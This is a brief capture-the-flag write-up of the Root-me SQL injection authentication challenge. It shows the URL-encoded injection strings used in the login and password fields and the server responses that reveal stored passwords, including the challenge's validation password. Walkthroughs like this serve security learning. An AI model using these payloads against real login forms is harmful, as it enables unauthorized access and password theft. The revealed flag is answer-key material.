Root-me.org

SQL Injection Authentication

Authentication v 0.01

In this challenge we need to retrieve the administrator password.

When we click on the challenge link, we’re brought to a login and password input box.

After trying to obvious authentication ways to bypass it, i found a coupled that worked.

One of the errors i did was to only try to bypass it using the password field.

So what i did was to use the username ‘admin’ and try to bypass the password field. This worked but gave us this:

The parameters we passed were:

login=admin&password='%20or%200%3d0%20--

The response

<h2>Welcome back user1 !</h2><h3>Your informations :</h3>
<p>- username : <input type="text" value="user1" disabled /><br/>
- password : <input type="password" value="TYsgv75zgtq" disabled /></p><br />

We’re logged as “user1” and if we try the password TYsgv75zgtq it does not work.

So i decided to try to bypass the login parameter also. That also gave me the same reponse as the previous one.

We had to append our sql injection after the username admin. The request looked like this.

login=admin'%20or%20''%3d'&password=test

And the response is:

<h2>Welcome back admin !</h2><h3>Your informations :</h3>
<p>- username : <input type="text" value="admin" disabled /><br/>- 
password : <input type="password" value="t0_W34k!$" disabled />
</p><br />Hi master ! <b>To validate the challenge use this password</b>

There’s the password.